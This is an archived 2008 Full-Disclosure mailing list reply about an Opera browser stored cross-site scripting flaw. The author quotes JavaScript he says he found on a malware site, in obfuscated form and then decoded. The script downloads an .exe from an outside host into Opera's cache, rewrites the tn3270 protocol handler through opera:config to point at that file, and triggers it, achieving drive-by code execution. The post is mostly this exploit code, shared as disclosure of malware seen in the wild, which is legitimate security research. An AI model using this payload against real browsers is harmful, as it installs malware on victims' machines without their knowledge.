lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 23 Oct 2008 16:12:27 +0200 (CEST) From: Kanedaaa Bohater <kaneda@...ater.net> To: full-disclosure@...ts.grok.org.uk Subject: Re: Opera Stored Cross Site Scripting > Just found a way to use Stefano's opera:config idea to execute code from > remote. Hi. 3 months ago I found on some malware site (www.google.com.update.login.jsp.podavanda.cn), that when Your UserAgent was Opera - they send to You code similar to Yours, but they first download malware .exe file to opera:cache (Opera use pre_downloading files) and later change tn3270:// protocol to this file (but without opera:historysearch). It was probably for older Opera version... <script> blank_iframe = document.createElement("ihfcrdahmdeR".replace(/[hc4dR]/g, '')); blank_iframe.src = "aYbYoYuct9:sbYlca9nck9".replace(/[Ycys9]/g, ''); blank_iframe.setAttribute("srtGy9lBe9".replace(/[9GBnr]/g, ''), "dRi~sRpPlRa~yc:~nSoSnPec".replace(/[cPR~S]/g, '')); blank_iframe.setAttribute("icdV".replace(/[#cARV]/g, ''), "bLlPaPn@...Bi@f@...Bm4eP_LwLiLn4dPoLw4".replace(/[P@BL4]/g, '')); document.appendChild(blank_iframe); blank_iframe_window.eval ("config_iframe = document.createElement("iAfWrEajmAeE".replace(/[jEWLA]/g, ''));\ config_iframe.setAttribute("iqdw".replace(/[q3wu#]/g, ''), "cboKnIfSiSgb_IibfKrIaSmbeI_uwKiKnSdboSwu".replace(/[IKSub]/g, ''));\ config_iframe.src = 'opera:config';\ document.appendChild(config_iframe);\ app_iframe = document.createElement("sncnr9inpXta".replace(/[9aXqn]/g, ''));\ cache_iframe = document.createElement("iUfurBaumBeB".replace(/[1lBUu]/g, ''));\ app_iframe.src = "hUtUtUpY:y/y/UwUwYwU.@...yo@...ye@...yoXmY.Xu@...YaytYeU.UlYoygXiyny.Uj@s@pX.@...Xd@...YaynydXaY.yc@...XI@I@...yxXlXoUaydUe@r@.ye@...X".replace(/[UXYy@]/g, '');\ app_iframe.onload = function ()\ {\ cache_iframe.src = "oApAeArVaR:AcRaVcAhVeR".replace(/[AVqKR]/g, '');\ cache_iframe.onload = function ()\ {\ cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\ var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\ filename = cache.match(re);\ config_iframe_window.eval\ (\"\ opera.setPreference("NReRtRwpour!kp".replace(/[%u\!Rp]/g, ''),"T!N#34247K0K 4AKp!p#".replace(/[\!4#YK]/g, ''),opera.getPreference("UjsaeYrw wPYrYeaf3sw".replace(/[aY3jw]/g, ''),"Cla8c8hZes sD8isrZeHcZt8olrlyl4H".replace(/[8lZsH]/g, ''))+parent.filename[1]);\ app_link = document.createElement('a');\ app_link.setAttribute("hsr%eWfW".replace(/[@3s%W]/g, ''), "tvnv3e2v7v0v:C/J/vnJoWtWheiJnWge".replace(/[CvJWe]/g, ''));\ app_link.click();\ setTimeout(function(){opera.setPreference("NjeCtSwjo7rjkS".replace(/[C7Sgj]/g, ''),"TPND3r2#7r0# PAPprpP".replace(/[P#DZr]/g, ''),"theClhnje~t~.jehxje~".replace(/[w~Cjh]/g, ''))},1000);\ \");\ };\ document.appendChild(cache_iframe);\ };\ document.appendChild(app_iframe);"); </script> which was something like: <script> blank_iframe = document.createElement("iframe"); blank_iframe.src = "about:blank"; blank_iframe.setAttribute("style", "display:none"); blank_iframe.setAttribute("id"), "blank_iframe_window"); document.appendChild(blank_iframe); blank_iframe_window.eval ("config_iframe = document.createElement("iframe");\ config_iframe.setAttribute("id", "config_iframe_window");\ config_iframe.src = 'opera:config';\ document.appendChild(config_iframe);\ app_iframe = document.createElement("script");\ cache_iframe = document.createElement("iframe");\ app_iframe.src = "hxxp://www.google.com.update.login.jsp.podavanda.cn/IIl/xloader.exe";\ app_iframe.onload = function ()\ {\ cache_iframe.src = "opera:cache";\ cache_iframe.onload = function ()\ {\ cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\ var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\ filename = cache.match(re);\ config_iframe_window.eval\ (\"\ opera.setPreference("Network","TN3270 App",opera.getPreference("User Prefs","Cache Directory4")+parent.filename[1]);\ app_link = document.createElement('a');\ app_link.setAttribute("href", "tn3270://nothing");\ app_link.click();\ setTimeout(function(){opera.setPreference("Network","TN3270 App","telnet.exe~")},1000);\ \");\ };\ document.appendChild(cache_iframe);\ };\ document.appendChild(app_iframe);"); </script> but unfortunately I dont have to much time for test... -- [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][].. [+] You can take our lives,but you will never take our Freedom - W.Wallace [+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama [+] Revolution the only solution - System of a down... [+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0 [-] Kanedaaa... Bohateur... Cucumber Team Member... kaneda@...ater.net _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists